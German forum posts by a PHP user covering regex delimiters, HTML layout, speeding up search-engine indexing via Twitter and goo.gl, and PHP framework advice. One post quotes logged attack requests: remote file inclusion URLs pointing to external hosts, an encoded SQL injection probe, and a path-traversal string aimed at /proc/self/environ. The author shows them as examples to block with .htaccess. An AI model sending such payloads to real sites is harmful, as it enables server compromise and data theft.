Beiträge von phpBuddy

    Und weswegen hast du die # vor und nach der Regex?



    Das sind Delimiter. Prinzipiell kann man jedes Zeichen dafür verwenden, solange es nicht im Suchmuster vorkommt.
    Es macht also keinen Unterschied, ob du # oder / oder ~ oder sonstwas als Delimiter verwendest.

    Zum Hochstellen von Zeichen gibt es extra den HTML-Tag sup. Hast Du ja schon festgestellt.
    Wie sieht denn das HTML dazu aus? Das sind tabellarische Daten; werden die auch in einer Tabelle dargestellt? Oder wird da gekünstelt mit Floats? Durch das floaten werden Elemente aus dem Textfluss genommen und höhere Passagen wirken sich dann nicht wie gewünscht auf andere Elemente aus. Schon mal mit line-height probiert? Oder eben wie gesagt, tabellarische Daten => Tabelle verwenden, dafür sind sie da. Dann passen sich auch die Zellen automatisch in der Höhe an.

    Okay okay, das mit dem Niemanden nehm ich zurück. :p
    Google und Yahoo scheint da sehr eng mit Twitter zusammenzuarbeiten. Vermutlich, oder ziemlich offensichtlich, werden getwitterte URLs direkt an die SuMas weitergegeben.



    Eine ebenso schnelle Möglichkeit den Googlebot auf die Seite zu holen ist übrigens auch, wenn man von einer neuen Seite eine KurzURL beim hauseigenen goo.gl Dienst erzeugen lässt. Das funktioniert aber logischerweise nur für Google. Der Yahoo Bot braucht dann doch noch ein bisschen, bis er von der neuen Seite erfährt.
    Ich habe mir für die goo.gl Geschichte ein kleines Script geschrieben, dass beim Seitenaufruf von der angeforderten URL automatisch eine goo.gl KurzURL erzeugen lässt und diese in eine lokale Datenbank schreibt. Existiert eine entsprechende KurzURL bereits in der DB, wird goo.gl auch nicht kontaktiert. Auf die Art kann man im Laufe der Zeit von allen Seiten einer Website eine permanente KurzURL erzeugen lassen und entsprechend verwenden oder eben eine neu angelegte Seite selbst einmal aufrufen um den Spider auf die Seite zu holen. Ich nutze das z.B. auf meiner phpBuddy Seite, um in den Social Bookmarks zu den Artikel die passende KurzURL einzufügen. Das erleichtert das direkte (re)twittern von Artikeln, da der User sich dann nicht selbst um eine KurzURL kümmern muss. Nebenbei hat es auch noch den positiven Effekt, dass man intern mal sieht, wie Seiten so aufgerufen werden und muss dazu nicht in den Tiefen der Webserver Logs forsten. Dann stolpert man schon mal über böse Buben Seitenaufrufe wie z.B.:


    Code
    1. http://www.phpbuddy.eu/dynamische-webseite-suchmaschinenfreundliche-url.html?start=1/?site=http://www.****.**.***.br/e-gov/noticia/ferramentas/dompdf/include/r.txt??
    2. http://www.phpbuddy.eu/formulare-verarbeiten-mit-php-grundlagen.html?start=1%25%27%09%09and%09len%28user%29%3e0%09and%09%278%25%27%3d%278
    3. http://www.phpbuddy.eu/file-inclusion-gefaehrliches-include-require.html?seite=....//....//....//....//....//..../proc/self/environ%00
    4. http://www.phpbuddy.eu/file-inclusion-gefaehrliches-include-require.html?showall=1/index.php?seite=http://www.*******.com.au/images/idx?
    5. usw.


    Das kann man dann gleich noch dazu nutzen seine .htaccess zu verfeinern, um solche unsinnigen Versuche prophylaktisch direkt in's Datennirvana zu befördern, ehe der Request bis zur Applikation durchdringt.


    Aber das ist ja ein völlig anderes Thema und hat nichts mit SEO zu tun.

    Moin TPler,


    ich habe im Laufe der letzten paar Monate mit verschiedenen Techniken versucht so schnell wie möglich neue Unterseiten (Blog Artikel, neue Produkte, etc.), von insgesamt 5 Domains auf unterschiedlichen IPs, in SuMas zu bringen, bzw. die Bots dazu zu bewegen die neue Seite zu besuchen.


    Dabei komme ich zu dem Fazit, dass der mit großem Abstand schnellste Weg ist, die URLs der neue Unterseiten zu twittern. Bei allen getwitterten URLs war der Bot so sauschnell auf der Seite, dass zwischen dem Abschicken des Tweet bis zum Zeitpunkt des Besuchs des Google- und Yahoo Bots noch keine Sekunde verging!
    Twitter scheint also doch für irgend etwas gut zu sein und so eine URL ist auch schneller getwittert, als man z.B. eine Sitemap prepariert hat und den Bot manuell in der Google Webmaster Zentrale anstößt.


    Interessiert vermutlich niemanden, aber ich wollte es dennoch mal mitgeteilt haben. :D

    Hallo AnnaStesia,


    was war denn mal an PHP Kenntnissen vorhanden und wie sehr sind diese eingerostet?


    Jedes mir bekannte Framework (nachfolgend FW) basiert auf MVC und setzt zumindest ein grundlegendes Verständnis der OOP voraus. Die Logik hinter MVC zu verstehen ist nicht wirklich schwer und mit wenigstens halbwegs brauchbaren OOP Kenntnissen sollte man mit einem FW schon klar kommen.
    Ein FW nimmt einem sehr viel ständig wiederkehrende Arbeit ab und man kann wirklich schnell auch komplexe Projekte verwirklichen. Falls Du noch nie mit einem FW gearbeitet hast, würde ich dir CodeIgniter empfehlen. Für den Einstieg und zum ausbauen des Verständnisses, wie ein FW funktioniert, ist CI vermutlich das Beste das es gibt. Hauptsächlich deswegen, weil es eine sehr gute Dokumentation hat, es sehr verbreitet ist und man entsprechend schnell Hilfe findet und weil es auf z.B. nettuts einen sehr guten, ausführlichen und professionell vorgetragenen Video Workshop zu CI gibt. Noch einfacher und schneller lernen kann man fast nicht. ;)


    Andere Frameworks, wie z.B. Cake, Zend, Symfony, Kohana (welches ich persönlich seit einer Weile verwende) sind deutlich schwerer zu erlernen, bzw setzen erheblich fundierte Kenntnisse voraus, sind dafür aber mächtiger.
    Es spricht aber nichts dagegen erst mal CI zu erlernen und sobald man fit für höhere Aufgaben ist, kann man immer noch auf ein anderes FW umsteigen. :D


    Ganz ohne OOP Kenntnisse wird das allerdings nichts, aber es gibt ja genügend Tutorials zu diesem Thema im Web - und auch hier im Tutorialbereich des Forums. Sollte es an allgemeinen PHP Kentnissen fehlen, findet man dazu auch eine ganze Menge im Web. Den ein oder anderen Anfängertipp, oder zum auffrischen von Kenntnissen, kann man bestimmt auch auf meiner PHP Seite finden.


    Und last but not least … bei Fragen oder falls es mal klemmt, kennst Du bestimmt das ein oder andere Forum oder den Ein oder Anderen PHPler, der eventuell Hilfestellung gegeben kann.


    Gutes frameworken wünsche ich. 8)



    [edit]Ich habe gerade gesehen, dass CI kürzlich das lange erwartete Upgrade veröffentlicht hat. Endlich haben die Jungs den gammeligen PHP 4 Support komplett entfernt und auch sonst einiges verbessert, was in anderen Frameworks schon lange zum Standard gehört. Meine Aussage oben bezog sich auf die Version 1.x, da ich die neue Version 2.0 bisher nicht kenne. Aber ich glaube die schau ich mir die Tage selbst mal an. :D
    Da das die erste Version eines Major Release ist kann man davon ausgehen, dass da in nächster Zeit noch das ein oder andere Update hinterhergeschoben wird um Bugs zu fixen.[/edit]

    Hallo,


    in $obj->key() steht das Element der aktuellen Iteration. Zweigt man nicht in ein Unterverzeichnis mit Dateien ab steht in diesem Fall also der Pfad zum Verzeichnis in key().
    Demnach tauschst Du das $zeiger->getFilename() gehen $zeiger->key() in der äußeren IF aus und solltest etwas in der Art ordner/unterordner1/unterordner2 erhalten.